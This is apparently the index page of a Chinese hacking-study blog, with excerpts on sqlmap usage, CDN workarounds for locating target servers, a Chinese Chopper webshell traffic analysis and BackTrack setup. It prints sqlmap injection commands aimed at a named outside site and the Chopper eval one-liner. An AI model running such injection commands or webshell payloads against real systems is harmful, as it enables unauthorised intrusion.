学习笔记 - Blog - PortWatcher's Blog

[转]sqlmap简单中文说明

mickey整理

来源：影子 //就是那个最近被抓的影子？常在河边走，哪能不湿鞋

更新

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell //执行SQL语句

sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5 //更详细的信息

load options from a configuration INI file

sqlmap -c sqlmap.conf

使用POST方法提交

sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method POST --data "id=1"

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies

python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1

使用referer欺骗

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --referer "http://www.google.com" -v ... Read more »

Category: 学习笔记 | Views: 598 | Added by: Jury | Date: 2012-07-13 | Comments (0)

cdn及其应对方法不完全整理

先看百度百科的介绍：
CDN的全称是Content Delivery Network，即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节，使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络，CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息将用户的请求重新导向离用户最近的服务节点上。其目的是使用户可就近取得所需内容，解决 Internet网络拥挤的状况，提高用户访问网站的响应速度。

Quote (kyo327的一句话科普)

用户在自己的浏览器中输入要访问的网站的域名，网站主dns选择比较近的cdn服务商节点，并把请求的内容缓存到cdn节点服务器，再把cdn节点服务器ip返回给用户，最后用户再向给定的cdn接点请求网站内容。

那么在日站过程中，CDN会给我们带来什么样的影响呢？当主站入侵受阻的时候，我们经常会想到从分站下手，这个时候必须反查域名，获得IP，从该服务器上的其他网站入手。但如果该站使用了CDN的话，经常得到的IP是CDN节点的IP，很难查到它的真实IP。

根本绕过CDN的解决似乎是没有的，至少我不知道，而且也不需要有，因为 ... Read more »

Category: 学习笔记 | Views: 485 | Added by: Jury | Date: 2012-07-04 | Comments (0)

汉化Backtrack5和安装ubuntu软件中心

转载说明出处：http://www.portwatcher.net/blog/backtrack5_ubuntu/2012-06-14-111

我个人认为让BT5变得真的像UBUNTU那样友好，容易上手的关键就是软件中心，先有了软件中心，之后大量实用软件都能通过它来下载。
高考之前我看到一个酷6的视频（参见我前面的博文http://www.portwatcher.net/blog/backtrack5_ubuntu/2012-05-17-109）实现了BT中加入UBUNTU软件中心，方法很笨却很直接，还有一个更简单的方法，直接apt-get install software-center，如果没装成就加入UBUNTU10.04的源apt-get update后再试一次。
   那个视频中想看清下载URL真不简单。我是结合我能看清的URL和GOOGLE语法才找到的。

   先搞中文环境吧，思路是这样的，先修改source.list，换成国内BT的软件源以提高之后所有步骤中apt-get的下载速度。
   然后修改 /etc/default/locale，将本地配置修改一下。
   然后安装中文语言包，最后安装中文语言的支持，输入法。

具体过程：
1.修改source.list

Code

root@

Category: 学习笔记 | Views: 7589 | Added by: Jury | Date: 2012-06-15 | Comments (1)

backtrack5加入ubuntu软件中心

自从换了backtrack5以后一直想解决这个问题，今天刚好看到现成的。

http://v.ku6.com/show/fGbkywRmUN-79jlM.html

Category: 学习笔记 | Views: 683 | Added by: Jury | Date: 2012-05-17 | Comments (0)

中国菜刀通讯加密分析

转自网络

Author：Tueur
今天在土司看到有人说菜刀有后门，正好我前段时间对菜刀一句话通讯做过分析，借此发篇文章献丑了。
说明：菜刀用post与服务端通讯，各种语言的加密方法都一样的，仅执行代码不同，这里仅以PHP为例。
其实菜刀的通讯加密并不是很复杂，仅用到base64_encode()函数，但是它的加密手法非常巧妙。
一般POST到服务器的数据，就算加密过了，我们也能用echo $_POST['pass']的方法得到加密后的数据，
所以我分析时在服务器上的"一句话”后面加了段代码，让所有$_POST['pass']的内容都各自保存到一个txt文本。
但用菜刀执行一些操作后，发现服务端保存的txt文本里都只有一句代码："@eval(base64_decode($_POST[z0]));”。
这是它的加密手法之一：POST里包含POST，这样即使管理员发现一句话木马，也无法截取到你执行了什么代码。
服务端突破基本无望，只能本地抓包了，下面这段代码是用抓包工具抓到新建文件的POST数据。(pass是一句话里的post变量名)

Code

pass=@eval(base64_d ... Read more »

Category: 学习笔记 | Views: 806 | Added by: Jury | Date: 2011-08-08 | Comments (1)

踩点 FootPrinting

作者:PortWatcher 转载请注明出处 www.portwatcher.net 希望各位珍惜我的劳动成果，打这么多字真的很累
对麦咖啡副总裁的旷世之作《黑客大曝光》的第一章进行总结，能提炼归纳的我尽量提炼归纳，不能提炼的就直接把原文打下来了。

什么是踩点

攻击者可以通过对某个组织进行有计划、有步骤的踩点，收集整理出一份关于该组织信息安防现状的完整剖析图。结合使用各种工具和技巧，加上一些有益的耐心和思维组织，攻击者完全可以从对某个组织（比如XYZ公司）毫无所知变成知之甚详，他们可以从公开渠道查出该组织具体使用的域名、网络地址块、与因特网直接相联的各有关系统的IP地址以及信息安防现状有关的其他细节。有很多种技术可以用来踩点，但它们的主要目的不外乎发现和收集与以下几种与网络环境相关的信息：

书中列表如下：

... Read more »

Category: 学习笔记 | Views: 1007 | Added by: Jury | Date: 2011-05-08 | Comments (1)

Ubuntu 10.10 安装BT4工具包

我原来只是简单地把BT4的软件源添加到自己的source.list里,今天看威宝的站,发现了更好更全面的方法```转之如下:

先下载BT4的工具菜单。
http://sourceforge.net/projects/backtrackubuntu/

解压后阅读readme.txt 按照它的步骤来做。

1 sudo bash backtrack-tools

2 cp /etc/xdg/menus/applications.menu /etc/xdg/menus/applications.menu.original

gedit /etc/xdg/menus/applications.menu

3 添加BT4的菜单选项。直接复制就ok。

4 cp -p files/* /usr/share/applications

5 sudo perl menu

之后就可以安装BT4的工具了。

本文摘自黑色小亮由网络安全攻防研究室(www.91ri.org) 黑客工具小组收集整理.

本文来自: 网络安全攻防研究室(www.91ri.org) 请尊重作者，转载时带上版权信息。详细内容请参考：http://www.91ri.org/1071.html

Category: 学习笔记 | Views: 1118 | Added by: Jury | Date: 2011-04-19 | Comments (1)

整理VB虚拟键盘按键

最近有人过生日,想写个程序作为生日礼物,打算用VB来写,功能是利用keydb_event()实现计算机虚拟人打字````
思路是1,2年前在<精通VB黑客编程>上看到的,时间隔得比较久,而书中对于虚拟键与真实键盘对应的声明描述得又不够完整```所以GOOGLE整理一下

Code

Option Explicit
Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)
Private Const VK_ADD As Long = &H6B '加号键
Private Const VK_APPS As Long = &H5D 'Applications 键（相当于鼠标右键）
Private Const VK_BACK As Long = &H8 'BackSpace 键
Private Const VK_CAPITAL As Long = &H14 'Caps Lock 键（大小写转换键）
Private Const VK_CANCEL As Long = &H3 'Ctrl + Break 过程
Private Const VK_CONTROL As Long = ... Read more »

Category: 学习笔记 | Views: 1018 | Added by: Jury | Date: 2011-02-03 | Comments (0)

读<Designing the Moment>所得

这本书中文名叫<瞬间之美-Web界面设计如何让用户心动>```据说WordPress公司人手一本````

作者是世界级大牛了,翻译人也是中国微软的WEB设计师```难怪```点大一本书````竟然卖45块````

以下内容是随心写的,想到什么写什么,有点像TAG :-)

1.就算是世界级的大牛,有时也会犯低级错误,比如说这本书,第23页有这么一句话:运气绝对是设计的一部分

而第45页又有这么一句话:设计绝对不包含任何运气成分,不知道是不是翻译的问题- -

但从中可以学到一点:是人就会犯错误,犯错误不可避免,即使是牛B的人.

2.少用alert.

3.不要让用户带着任何疑惑去使用你的Web产品,在必要的时候为你的界面做标记.

Category: 学习笔记 | Views: 835 | Added by: Jury | Date: 2011-01-08 | Comments (0)

解密一加密php文件

一日朋友发我一个加密PHP说文件运行不了``可能是源码有错```但由于源码被加密了所以要我帮着解密一下
密文如下:

Code

echo(base64_decode('JElJSUlJSUlJSUlJST0naGVhZGVyJzs='));$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%
73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=1316;$OOO0000O0=$OOO000
000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO00000
0{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000
000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezE
yfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9Li ... Read more »

Category: 学习笔记 | Views: 1781 | Added by: Jury | Date: 2010-12-25 | Comments (0)

1 2 »

分类

站内搜索

日历

友情链接

访问统计(起于2010/10/2)

Blog